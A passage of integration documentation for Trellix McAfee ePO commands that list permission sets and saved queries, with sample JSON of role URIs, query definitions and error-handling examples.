                    "roleUri": "role:UDLPSRVR2013.incident.evidence?viewFile=true&viewMatch=true"
                },
                {
                    "roleUri": "role:udlp.helpDesk.actions.agentReleaseFromQuarantineKey.creator"
                },
                {
                    "roleUri": "role:udlp.helpDesk.actions.masterReleaseKey.creator"
                },
                {
                    "roleUri": "role:notes.fullPerms"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.classification.action?regDocsAndWhitelist=true&manualClassification=true"
                },
                {
                    "roleUri": "role:core.audit.reviewer"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.incident.type?endpointDiscovery=true&data=true&device=true&discovery=true&skyhigh=true"
                },
                {
                    "roleUri": "role:epo.core.wakeup.agent"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.classification.list?masterPerm=FULL"
                },
                {
                    "roleUri": "role:epo.core.tag.assign"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.dlp.settings?advancedTab=true&skyhighTab=true&caseTab=true&backupRestoreTab=true&generalTab=true&incidentTab=true&operationalTab=true"
                },
                {
                    "roleUri": "role:UDLPSRVR2013.rule.type.full?data=true&device=true&discovery=true"
                },
                {
                    "roleUri": "role:core.query.user"
                }
            ]
        }
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
No Sample Data
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

@ID

NAME

ROLES

2

Global Reviewer

{
";role";: [
{
";roleUri";: ";role:ENDP_FW_META.ENDP_FW_META_FW.reviewer";
},
{
";roleUri";: ";role:EPOAGENTMETA.tasks.reviewer";
},
{
";roleUri";: ";role:MVEDR___META.MVEDR___META.reviewer";
},
{
";roleUri";: ";role:epo.core.view.tree";
},
{
";roleUri";: ";role:core.dash.viewer";
},
{
";roleUri";: ";role:MARCOBA_META.MARCOBA_META.reviewer";
},
{
";roleUri";: ";role:MVEDR___META.tasks.reviewer";
},
{
";roleUri";: ";role:issue.auditor?type=issue.type.untyped";
},
{
";roleUri";: ";role:TIEMGMT_META.TIEMGMT_META.reviewer";
},
{
";roleUri";: ";role:MARCOBA_META.tasks.reviewer";
},
{
";roleUri";: ";role:DXLCLNT_META.DXLCLNT_META.reviewer";
},
{
";roleUri";: ";role:softman.viewOnly";
},
{
";roleUri";: ";role:ENDP_WP_1000.tasks.reviewer";
},
{
";roleUri";: ";role:ENDP_GS_1000.ENDP_GS_1000.reviewer";
},
{
";roleUri";: ";role:epo.dir.access";,
";customRoleInfo";: {
";@roleFactoryId";: ";epo.dir";,
";systems";: {
";system";: ";\\";
}
}
},
{
";roleUri";: ";role:ENDP_AM_1000.tasks.reviewer";
},
{
";roleUri";: ";role:response.rule.user";
},
{
";roleUri";: ";role:EPOAGENTMETA.EPOAGENTMETA.reviewer";
},
{
";roleUri";: ";role:ahRole.viewOnly";
},
{
";roleUri";: ";role:rs.user";
},
{
";roleUri";: ";role:core.audit.reviewer";
},
{
";roleUri";: ";role:DXLBROKRMETA.DXLBROKRMETA.reviewer";
},
{
";roleUri";: ";role:core.query.guest";
},
{
";roleUri";: ";role:ENDP_AM_1000.ENDP_AM_1000.reviewer";
},
{
";roleUri";: ";role:TIEClientMETA.TIEClientMETA.reviewer";
},
{
";roleUri";: ";role:rollup.execute";
},
{
";roleUri";: ";role:UDLPSRVR2013.UDLPSRVR2013.reviewer";
},
{
";roleUri";: ";role:core.addressbook.guest";
},
{
";roleUri";: ";role:MCPSRVER1000.MCPSRVER1000.reviewer";
},
{
";roleUri";: ";role:ENDP_WP_1000.ENDP_WP_1000.reviewer";
},
{
";roleUri";: ";role:epo.productevents.view";
},
{
";roleUri";: ";role:ubpRole.viewOnly";
},
{
";roleUri";: ";role:repoRole.distViewOnly";
},
{
";roleUri";: ";role:epo.event.view";
},
{
";roleUri";: ";role:notes.viewOnly";
},
{
";roleUri";: ";role:scheduler.view";
},
{
";roleUri";: ";role:repoRole.masterViewOnly";
},
{
";roleUri";: ";role:ENDP_GS_1000.tasks.reviewer";
}
]
}

3

Group Reviewer

{
";role";: [
{
";roleUri";: ";role:core.addressbook.guest";
},
{
";roleUri";: ";role:core.dash.viewer";
},
{
";roleUri";: ";role:epo.productevents.view";
},
{
";roleUri";: ";role:scheduler.view";
},
{
";roleUri";: ";role:epo.event.view";
},
{
";roleUri";: ";role:notes.viewOnly";
},
{
";roleUri";: ";role:core.query.guest";
},
{
";roleUri";: ";role:epo.core.view.tree";
},
{
";roleUri";: ";role:response.rule.user";
}
]
}

4

Executive Reviewer

{
";role";: [
{
";roleUri";: ";role:epo.productevents.view";
},
{
";roleUri";: ";role:core.query.guest";
},
{
";roleUri";: ";role:epo.dir.access";,
";customRoleInfo";: {
";@roleFactoryId";: ";epo.dir";,
";systems";: {
";system";: ";\\";
}
}
},
{
";roleUri";: ";role:core.dash.viewer";
},
{
";roleUri";: ";role:core.addressbook.guest";
},
{
";roleUri";: ";role:epo.event.view";
}
]
}

5

MCP Catalog Admin

{
";role";: [
{
";roleUri";: ";role:common.catalog.data.general?catalogId=******&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT";
},
{
";roleUri";: ";role:common.catalog.data.general?catalogId=00000000-0000-0000-0000-000000000000&itemTypeId8=perm.EDIT&itemTypeId102=perm.EDIT&itemTypeId201=perm.EDIT&itemTypeId20=perm.EDIT";
},
{
";roleUri";: ";role:common.catalog.actions.general?exportFile=&importFromCatalog=&createCatalog=&deleteCatalog=&importFromFile=";
},
{
";roleUri";: ";role:MCPSRVER1000.MCPSRVER1000.admin";
}
]
}

6

Group Active Response Editor

{
";role";: [
{
";roleUri";: ";role:mar-server.reactionRole.write";
},
{
";roleUri";: ";role:mar-server.searchRole.write";
},
{
";roleUri";: ";role:MARCOBA_META.MARCOBA_META.admin";
},
{
";roleUri";: ";role:mar-server.collectorRole.write";
},
{
";roleUri";: ";role:epo.event.view";
},
{
";roleUri";: ";role:mar-server.triggerRole.write";
}
]
}

7

Group Active Response Responder

{
";role";: [
{
";roleUri";: ";role:mar-server.searchRole.write";
},
{
";roleUri";: ";role:MARCOBA_META.MARCOBA_META.reviewer";
},
{
";roleUri";: ";role:mar-server.triggerRole.read";
},
{
";roleUri";: ";role:epo.event.view";
},
{
";roleUri";: ";role:mar-server.reactionRole.read";
},
{
";roleUri";: ";role:mar-server.collectorRole.read";
}
]
}

8

Group Active Response Workspace Monitor

{
";role";: [
{
";roleUri";: ";role:mar-server.searchRole.read";
},
{
";roleUri";: ";role:mar-workspace.workspace.read";
},
{
";roleUri";: ";role:mar-server.collectorRole.read";
},
{
";roleUri";: ";role:tie.viewer";
}
]
}

9

Group Active Response Workspace Responder

{
";role";: [
{
";roleUri";: ";role:mar-server.triggerRole.write";
},
{
";roleUri";: ";role:mar-server.reactionRole.run";
},
{
";roleUri";: ";role:mar-server.searchRole.write";
},
{
";roleUri";: ";role:mar-server.collectorRole.write";
},
{
";roleUri";: ";role:tie.manager";
},
{
";roleUri";: ";role:mar-workspace.workspace.write";
},
{
";roleUri";: ";role:mar-server.reactionRole.write";
}
]
}

10

Group MVISION EDR FW

{
";role";: {
";roleUri";: ";role:copperfieldFw.write";
}
}

11

Group Admin

{
";role";: [
{
";roleUri";: ";role:udlp.helpDesk.actions.agentOverrideKey.creator";
},
{
";roleUri";: ";role:UDLPSRVR2013.operational.reviewer.full";
},
{
";roleUri";: ";role:udlp.helpDesk.actions.agentUninstallKey.creator";
},
{
";roleUri";: ";role:core.addressbook.admin";
},
{
";roleUri";: ";role:core.dash.user";
},
{
";roleUri";: ";role:epo.core.modify.tree";
},
{
";roleUri";: ";role:UDLPSRVR2013.policy.list?masterPerm=VIEW";
},
{
";roleUri";: ";role:UDLPSRVR2013.incident.task?email=true&purge=true&setReviewer=true";
},
{
";roleUri";: ";role:epo.productevents.view";
},
{
";roleUri";: ";role:scheduler.view";
},
{
";roleUri";: ";role:epo.core.deploy.agent";
},
{
";roleUri";: ";role:UDLPSRVR2013.ruleSet.list?masterPerm=FULL";
},
{
";roleUri";: ";role:epo.event.view";
},
{
";roleUri";: ";role:notes.overRide";
},
{
";roleUri";: ";role:epo.core.tagcat.user";
},
{
";roleUri";: ";role:ubpRole.viewOnly";
},
{
";roleUri";: ";role:UDLPSRVR2013.definition.list?itemTypeId80=perm.FULL&itemTypeId81=perm.FULL&itemTypeId9=perm.FULL&itemTypeId82=perm.FULL&itemTypeId8=perm.FULL&itemTypeId83=perm.FULL&itemTypeId84=perm.FULL&itemTypeId85=perm.FULL&itemTypeId20=perm.FULL&itemTypeId86=perm.FULL&itemTypeId1000=perm.FULL&itemTypeId21=perm.FULL&itemTypeId87=perm.FULL&itemTypeId88=perm.FULL&itemTypeId23=perm.FULL&itemTypeId24=perm.FULL&itemTypeId26=perm.FULL&catalogId=d3ab4ed4-efab-48d2-840d-714cbf76b888&itemTypeId3=perm.FULL&itemTypeId2=perm.FULL&itemTypeId1=perm.FULL&itemTypeId0=perm.FULL&itemTypeId6=perm.FULL&itemTypeId5=perm.FULL&itemTypeId4=perm.FULL&itemTypeId90=perm.FULL&itemTypeId91=perm.FULL&itemTypeId92=perm.FULL&itemTypeId93=perm.FULL&itemTypeId94=perm.FULL&itemTypeId10=perm.FULL&itemTypeId2000=perm.FULL&itemTypeId11=perm.FULL&itemTypeId12=perm.FULL&itemTypeId103=perm.FULL&itemTypeId79=perm.FULL&itemTypeId15=perm.FULL&itemTypeId100=perm.FULL&itemTypeId16=perm.FULL&itemTypeId17=perm.FULL&itemTypeId102=perm.FULL&itemTypeId101=perm.FULL";
},
{
";roleUri";: ";role:ahRole.viewOnly";
},
{
";roleUri";: ";role:repoRole.distViewOnly";
},
{
";roleUri";: ";role:UDLPSRVR2013.incident.reviewer.full?skyhigh=true";
},
{
";roleUri";: ";role:UDLPSRVR2013.operational.task?email=true&purge=true&setReviewer=true";
},
{
";roleUri";: ";role:repoRole.masterViewOnly";
},
{
";roleUri";: ";role:epo.core.view.tree";
},
{
";roleUri";: ";role:UDLPSRVR2013.incident.redaction?view=true&reveal=true";
},
{
";roleUri";: ";role:epo.event.admin";
},
{
";roleUri";: ";role:UDLPSRVR2013.discover.main.full";
},
{
";roleUri";: ";role:UDLPSRVR2013.case.reviewer.full";
},
{
";roleUri";: ";role:response.rule.admin";
},
{
";roleUri";: ";role:UDLPSRVR2013.capture.main.full";
},
{
";roleUri";: ";role:UDLPSRVR2013.incident.evidence?viewFile=true&viewMatch=true";
},
{
";roleUri";: ";role:udlp.helpDesk.actions.agentReleaseFromQuarantineKey.creator";
},
{
";roleUri";: ";role:udlp.helpDesk.actions.masterReleaseKey.creator";
},
{
";roleUri";: ";role:notes.fullPerms";
},
{
";roleUri";: ";role:UDLPSRVR2013.classification.action?regDocsAndWhitelist=true&manualClassification=true";
},
{
";roleUri";: ";role:core.audit.reviewer";
},
{
";roleUri";: ";role:UDLPSRVR2013.incident.type?endpointDiscovery=true&data=true&device=true&discovery=true&skyhigh=true";
},
{
";roleUri";: ";role:epo.core.wakeup.agent";
},
{
";roleUri";: ";role:UDLPSRVR2013.classification.list?masterPerm=FULL";
},
{
";roleUri";: ";role:epo.core.tag.assign";
},
{
";roleUri";: ";role:UDLPSRVR2013.dlp.settings?advancedTab=true&skyhighTab=true&caseTab=true&backupRestoreTab=true&generalTab=true&incidentTab=true&operationalTab=true";
},
{
";roleUri";: ";role:UDLPSRVR2013.rule.type.full?data=true&device=true&discovery=true";
},
{
";roleUri";: ";role:core.query.user";
}
]
}

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

List Permission Set failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

List Permission Set failed.

Status Code: 401.

Message: Unauthorized.

List Query

Retrieves a list of all queries.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "id": 1,
        "name": "Effective permissions for users",
        "description": "Shows all permissions for each user",
        "conditionSexp": "Permission Does not equal \"%%NOEPOROLES%%\"",
        "groupName": "Permissions",
        "userName": "Public",
        "databaseType": "",
        "target": "EntitlementView",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:00:39-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:00:39-08:00"
    },
    {
        "id": 2,
        "name": "Permission set details",
        "description": "Shows the permissions associated with each permission set",
        "conditionSexp": "",
        "groupName": "Permissions",
        "userName": "Public",
        "databaseType": "",
        "target": "EntitlementView",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:00:41-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:00:41-08:00"
    },
    {
        "id": 3,
        "name": "Permission set membership",
        "description": "Shows the permission sets associated with each principal",
        "conditionSexp": "",
        "groupName": "Permissions",
        "userName": "Public",
        "databaseType": "",
        "target": "EntitlementView",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:00:41-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:00:41-08:00"
    },
    {
        "id": 4,
        "name": "Failed User Actions in ePO Console within Last 30 Days",
        "description": "Displays a table of all failed actions within the last 30 days from the Audit Log.",
        "conditionSexp": "(Success Equals False and Start Time Is within the last 1 Months)",
        "groupName": "User Auditing",
        "userName": "Public",
        "databaseType": "",
        "target": "OrionAuditLog",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:04:19-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:04:19-08:00"
    },
    {
        "id": 5,
        "name": "Today's Detections per Product",
        "description": "Displays a pie chart of detections within the last 24 hours organized by detecting product.",
        "conditionSexp": "(Event Generated Time Is within the last 1 Days and Event Category Does not belong to Operational)",
        "groupName": "Detections and Compliance",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOEvents",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:04:19-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:04:19-08:00"
    },
    {
        "id": 6,
        "name": "Systems per Top-Level Group",
        "description": "Displays a bar chart of your managed systems organized by top-level System Tree group.",
        "conditionSexp": "Managed State Equals Managed",
        "groupName": "System Management",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOLeafNode",
        "createdBy": "admin",
        "createdOn": "2019-05-23T20:54:41-07:00",
        "modifiedBy": "admin",
        "modifiedOn": "2019-05-23T20:54:41-07:00"
    },
    {
        "id": 7,
        "name": "Duplicate Systems Names",
        "description": "Lists all system names that appear in multiple System Tree locations.",
        "conditionSexp": "System Name Is duplicated ",
        "groupName": "System Management",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOLeafNode",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:04:20-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:04:20-08:00"
    },
    {
        "id": 8,
        "name": "McAfee Agent Compliance Summary",
        "description": "Displays a Boolean pie chart of managed systems in your environment which are compliant or noncompliant by version of McAfee Agent.",
        "conditionSexp": "Last Communication Is within the last 1 Days",
        "groupName": "Detections and Compliance",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOLeafNode",
        "createdBy": "admin",
        "createdOn": "2019-05-23T20:54:40-07:00",
        "modifiedBy": "admin",
        "modifiedOn": "2019-05-23T20:54:40-07:00"
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "id": 1,
        "name": "Effective permissions for users",
        "description": "Shows all permissions for each user",
        "conditionSexp": "Permission Does not equal \"%%NOEPOROLES%%\"",
        "groupName": "Permissions",
        "userName": "Public",
        "databaseType": "",
        "target": "EntitlementView",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:00:39-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:00:39-08:00"
    },
    {
        "id": 2,
        "name": "Permission set details",
        "description": "Shows the permissions associated with each permission set",
        "conditionSexp": "",
        "groupName": "Permissions",
        "userName": "Public",
        "databaseType": "",
        "target": "EntitlementView",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:00:41-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:00:41-08:00"
    },
    {
        "id": 3,
        "name": "Permission set membership",
        "description": "Shows the permission sets associated with each principal",
        "conditionSexp": "",
        "groupName": "Permissions",
        "userName": "Public",
        "databaseType": "",
        "target": "EntitlementView",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:00:41-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:00:41-08:00"
    },
    {
        "id": 4,
        "name": "Failed User Actions in ePO Console within Last 30 Days",
        "description": "Displays a table of all failed actions within the last 30 days from the Audit Log.",
        "conditionSexp": "(Success Equals False and Start Time Is within the last 1 Months)",
        "groupName": "User Auditing",
        "userName": "Public",
        "databaseType": "",
        "target": "OrionAuditLog",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:04:19-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:04:19-08:00"
    },
    {
        "id": 5,
        "name": "Today's Detections per Product",
        "description": "Displays a pie chart of detections within the last 24 hours organized by detecting product.",
        "conditionSexp": "(Event Generated Time Is within the last 1 Days and Event Category Does not belong to Operational)",
        "groupName": "Detections and Compliance",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOEvents",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:04:19-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:04:19-08:00"
    },
    {
        "id": 6,
        "name": "Systems per Top-Level Group",
        "description": "Displays a bar chart of your managed systems organized by top-level System Tree group.",
        "conditionSexp": "Managed State Equals Managed",
        "groupName": "System Management",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOLeafNode",
        "createdBy": "admin",
        "createdOn": "2019-05-23T20:54:41-07:00",
        "modifiedBy": "admin",
        "modifiedOn": "2019-05-23T20:54:41-07:00"
    },
    {
        "id": 7,
        "name": "Duplicate Systems Names",
        "description": "Lists all system names that appear in multiple System Tree locations.",
        "conditionSexp": "System Name Is duplicated ",
        "groupName": "System Management",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOLeafNode",
        "createdBy": "admin",
        "createdOn": "2018-02-14T13:04:20-08:00",
        "modifiedBy": "admin",
        "modifiedOn": "2018-02-14T13:04:20-08:00"
    },
    {
        "id": 8,
        "name": "McAfee Agent Compliance Summary",
        "description": "Displays a Boolean pie chart of managed systems in your environment which are compliant or noncompliant by version of McAfee Agent.",
        "conditionSexp": "Last Communication Is within the last 1 Days",
        "groupName": "Detections and Compliance",
        "userName": "Public",
        "databaseType": "",
        "target": "EPOLeafNode",
        "createdBy": "admin",
        "createdOn": "2019-05-23T20:54:40-07:00",
        "modifiedBy": "admin",
        "modifiedOn": "2019-05-23T20:54:40-07:00"
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[{\\r\\n        \\\"id\\\": 1,\\r\\n        \\\"name\\\": \\\"Effective permissions for users\\\",\\r\\n        \\\"description\\\": \\\"Shows all permissions for each user\\\",\\r\\n        \\\"conditionSexp\\\": \\\"Permission Does not equal \\\\\\\"%%NOEPOROLES%%\\\\\\\"\\\",\\r\\n        \\\"groupName\\\": \\\"Permissions\\\",\\r\\n        \\\"userName\\\": \\\"Public\\\",\\r\\n        \\\"databaseType\\\": \\\"\\\",\\r\\n        \\\"target\\\": \\\"EntitlementView\\\",\\r\\n        \\\"createdBy\\\": \\\"admin\\\",\\r\\n        \\\"createdOn\\\": \\\"2022-04-21T16:10:53-07:00\\\",\\r\\n        \\\"modifiedBy\\\": \\\"admin\\\",\\r\\n        \\\"modifiedOn\\\": \\\"2022-04-21T16:10:53-07:00\\\"\\r\\n    } ]\"",
    "id": "\"[\\r\\n\\t\\t\\t1,\\r\\n\\t\\t\\t2,\\r\\n\\t\\t\\t3,\\r\\n\\t\\t\\t4,\\r\\n\\t\\t\\t5,\\r\\n\\t\\t\\t6,\\r\\n\\t\\t\\t7,\\r\\n\\t\\t\\t8,\\r\\n\\t\\t\\t9,\\r\\n\\t\\t\\t10,\\r\\n\\t\\t\\t11,\\r\\n\\t\\t\\t12,\\r\\n\\t\\t\\t13,\\r\\n\\t\\t\\t14,\\r\\n\\t\\t\\t15,\\r\\n\\t\\t\\t16,\\r\\n\\t\\t\\t17,\\r\\n\\t\\t\\t18,\\r\\n\\t\\t\\t19,\\r\\n\\t\\t\\t20,\\r\\n\\t\\t\\t21,\\r\\n\\t\\t\\t50,\\r\\n\\t\\t\\t51,\\r\\n\\t\\t\\t22,\\r\\n\\t\\t\\t23,\\r\\n\\t\\t\\t24,\\r\\n\\t\\t\\t25,\\r\\n\\t\\t\\t26,\\r\\n\\t\\t\\t27,\\r\\n\\t\\t\\t28,\\r\\n\\t\\t\\t29,\\r\\n\\t\\t\\t30,\\r\\n\\t\\t\\t31,\\r\\n\\t\\t\\t32,\\r\\n\\t\\t\\t33,\\r\\n\\t\\t\\t34,\\r\\n\\t\\t\\t35,\\r\\n\\t\\t\\t36,\\r\\n\\t\\t\\t37,\\r\\n\\t\\t\\t38,\\r\\n\\t\\t\\t40,\\r\\n\\t\\t\\t41,\\r\\n\\t\\t\\t42,\\r\\n\\t\\t\\t43,\\r\\n\\t\\t\\t39,\\r\\n\\t\\t\\t52,\\r\\n\\t\\t\\t53,\\r\\n\\t\\t\\t54,\\r\\n\\t\\t\\t55,\\r\\n\\t\\t\\t110,\\r\\n\\t\\t\\t111,\\r\\n\\t\\t\\t112,\\r\\n\\t\\t\\t113,\\r\\n\\t\\t\\t114,\\r\\n\\t\\t\\t115,\\r\\n\\t\\t\\t116,\\r\\n\\t\\t\\t117,\\r\\n\\t\\t\\t118,\\r\\n\\t\\t\\t119,\\r\\n\\t\\t\\t120,\\r\\n\\t\\t\\t121,\\r\\n\\t\\t\\t122,\\r\\n\\t\\t\\t123,\\r\\n\\t\\t\\t125,\\r\\n\\t\\t\\t126,\\r\\n\\t\\t\\t127,\\r\\n\\t\\t\\t124,\\r\\n\\t\\t\\t128,\\r\\n\\t\\t\\t129,\\r\\n\\t\\t\\t130,\\r\\n\\t\\t\\t131,\\r\\n\\t\\t\\t132,\\r\\n\\t\\t\\t133,\\r\\n\\t\\t\\t134,\\r\\n\\t\\t\\t135,\\r\\n\\t\\t\\t136,\\r\\n\\t\\t\\t137,\\r\\n\\t\\t\\t138,\\r\\n\\t\\t\\t139,\\r\\n\\t\\t\\t140,\\r\\n\\t\\t\\t141,\\r\\n\\t\\t\\t142,\\r\\n\\t\\t\\t143,\\r\\n\\t\\t\\t189,\\r\\n\\t\\t\\t286,\\r\\n\\t\\t\\t287,\\r\\n\\t\\t\\t56,\\r\\n\\t\\t\\t57,\\r\\n\\t\\t\\t58,\\r\\n\\t\\t\\t59,\\r\\n\\t\\t\\t60,\\r\\n\\t\\t\\t61,\\r\\n\\t\\t\\t62,\\r\\n\\t\\t\\t63,\\r\\n\\t\\t\\t64,\\r\\n\\t\\t\\t65,\\r\\n\\t\\t\\t66,\\r\\n\\t\\t\\t67,\\r\\n\\t\\t\\t68,\\r\\n\\t\\t\\t69,\\r\\n\\t\\t\\t70,\\r\\n\\t\\t\\t71,\\r\\n\\t\\t\\t72,\\r\\n\\t\\t\\t73,\\r\\n\\t\\t\\t74,\\r\\n\\t\\t\\t75,\\r\\n\\t\\t\\t76,\\r\\n\\t\\t\\t77,\\r\\n\\t\\t\\t78,\\r\\n\\t\\t\\t79,\\r\\n\\t\\t\\t80,\\r\\n\\t\\t\\t81,\\r\\n\\t\\t\\t82,\\r\\n\\t\\t\\t83,\\r\\n\\t\\t\\t84,\\r\\n\\t\\t\\t85,\\r\\n\\t\\t\\t86,\\r\\n\\t\\t\\t87,\\r\\n\\t\\t\\t88,\\r\\n\\t\\t\\t89,\\r\\n\\t\\t\\t90,\\r\\n\\t\\t\\t91,\\r\\n\\t\\t\\t92,\\r\\n\\t\\t\\t93,\\r\\n\\t\\t\\t94,\\r\\n\\t\\t\\t95,\\r\\n\\t\\t\\t96,\\r\\n\\t\\t\\t281,\\r\\n\\t\\t\\t282,\\r\\n\\t\\t\\t296,\\r\\n\\t\\t\\t297,\\r\\n\\t\\t\\t298,\\r\\n\\t\\t\\t97,\\r\\n\\t\\t\\t98,\\r\\n\\t\\t\\t99,\\r\\n\\t\\t\\t100,\\r\\n\\t\\t\\t101,\\r\\n\\t\\t\\t102,\\r\\n\\t\\t\\t103,\\r\\n\\t\\t\\t104,\\r\\n\\t\\t\\t105,\\r\\n\\t\\t\\t106,\\r\\n\\t\\t\\t107,\\r\\n\\t\\t\\t108,\\r\\n\\t\\t\\t109,\\r\\n\\t\\t\\t316,\\r\\n\\t\\t\\t317,\\r\\n\\t\\t\\t321,\\r\\n\\t\\t\\t322,\\r\\n\\t\\t\\t323,\\r\\n\\t\\t\\t324,\\r\\n\\t\\t\\t325,\\r\\n\\t\\t\\t144,\\r\\n\\t\\t\\t145,\\r\\n\\t\\t\\t146,\\r\\n\\t\\t\\t147,\\r\\n\\t\\t\\t148,\\r\\n\\t\\t\\t149,\\r\\n\\t\\t\\t150,\\r\\n\\t\\t\\t151,\\r\\n\\t\\t\\t152,\\r\\n\\t\\t\\t153,\\r\\n\\t\\t\\t154,\\r\\n\\t\\t\\t155,\\r\\n\\t\\t\\t156,\\r\\n\\t\\t\\t188,\\r\\n\\t\\t\\t326,\\r\\n\\t\\t\\t327,\\r\\n\\t\\t\\t331,\\r\\n\\t\\t\\t333,\\r\\n\\t\\t\\t334,\\r\\n\\t\\t\\t335,\\r\\n\\t\\t\\t283,\\r\\n\\t\\t\\t288,\\r\\n\\t\\t\\t289,\\r\\n\\t\\t\\t290,\\r\\n\\t\\t\\t291,\\r\\n\\t\\t\\t292,\\r\\n\\t\\t\\t293,\\r\\n\\t\\t\\t301,\\r\\n\\t\\t\\t302,\\r\\n\\t\\t\\t304,\\r\\n\\t\\t\\t305,\\r\\n\\t\\t\\t306,\\r\\n\\t\\t\\t328,\\r\\n\\t\\t\\t185,\\r\\n\\t\\t\\t186,\\r\\n\\t\\t\\t187,\\r\\n\\t\\t\\t329,\\r\\n\\t\\t\\t330,\\r\\n\\t\\t\\t361,\\r\\n\\t\\t\\t362,\\r\\n\\t\\t\\t363,\\r\\n\\t\\t\\t364,\\r\\n\\t\\t\\t365,\\r\\n\\t\\t\\t366,\\r\\n\\t\\t\\t367,\\r\\n\\t\\t\\t368,\\r\\n\\t\\t\\t369,\\r\\n\\t\\t\\t370,\\r\\n\\t\\t\\t371,\\r\\n\\t\\t\\t372,\\r\\n\\t\\t\\t373,\\r\\n\\t\\t\\t374,\\r\\n\\t\\t\\t375,\\r\\n\\t\\t\\t376,\\r\\n\\t\\t\\t377,\\r\\n\\t\\t\\t378,\\r\\n\\t\\t\\t380,\\r\\n\\t\\t\\t382,\\r\\n\\t\\t\\t332,\\r\\n\\t\\t\\t336,\\r\\n\\t\\t\\t337,\\r\\n\\t\\t\\t338,\\r\\n\\t\\t\\t339,\\r\\n\\t\\t\\t340,\\r\\n\\t\\t\\t341,\\r\\n\\t\\t\\t342,\\r\\n\\t\\t\\t343,\\r\\n\\t\\t\\t344,\\r\\n\\t\\t\\t345,\\r\\n\\t\\t\\t346,\\r\\n\\t\\t\\t347,\\r\\n\\t\\t\\t348,\\r\\n\\t\\t\\t349,\\r\\n\\t\\t\\t276,\\r\\n\\t\\t\\t277,\\r\\n\\t\\t\\t350,\\r\\n\\t\\t\\t351,\\r\\n\\t\\t\\t352,\\r\\n\\t\\t\\t353,\\r\\n\\t\\t\\t354,\\r\\n\\t\\t\\t355,\\r\\n\\t\\t\\t356,\\r\\n\\t\\t\\t357,\\r\\n\\t\\t\\t358,\\r\\n\\t\\t\\t359,\\r\\n\\t\\t\\t360,\\r\\n\\t\\t\\t278,\\r\\n\\t\\t\\t279,\\r\\n\\t\\t\\t280,\\r\\n\\t\\t\\t284,\\r\\n\\t\\t\\t285,\\r\\n\\t\\t\\t275,\\r\\n\\t\\t\\t294,\\r\\n\\t\\t\\t295,\\r\\n\\t\\t\\t299,\\r\\n\\t\\t\\t300,\\r\\n\\t\\t\\t303,\\r\\n\\t\\t\\t307,\\r\\n\\t\\t\\t308,\\r\\n\\t\\t\\t309,\\r\\n\\t\\t\\t310,\\r\\n\\t\\t\\t311,\\r\\n\\t\\t\\t312,\\r\\n\\t\\t\\t313,\\r\\n\\t\\t\\t314,\\r\\n\\t\\t\\t315,\\r\\n\\t\\t\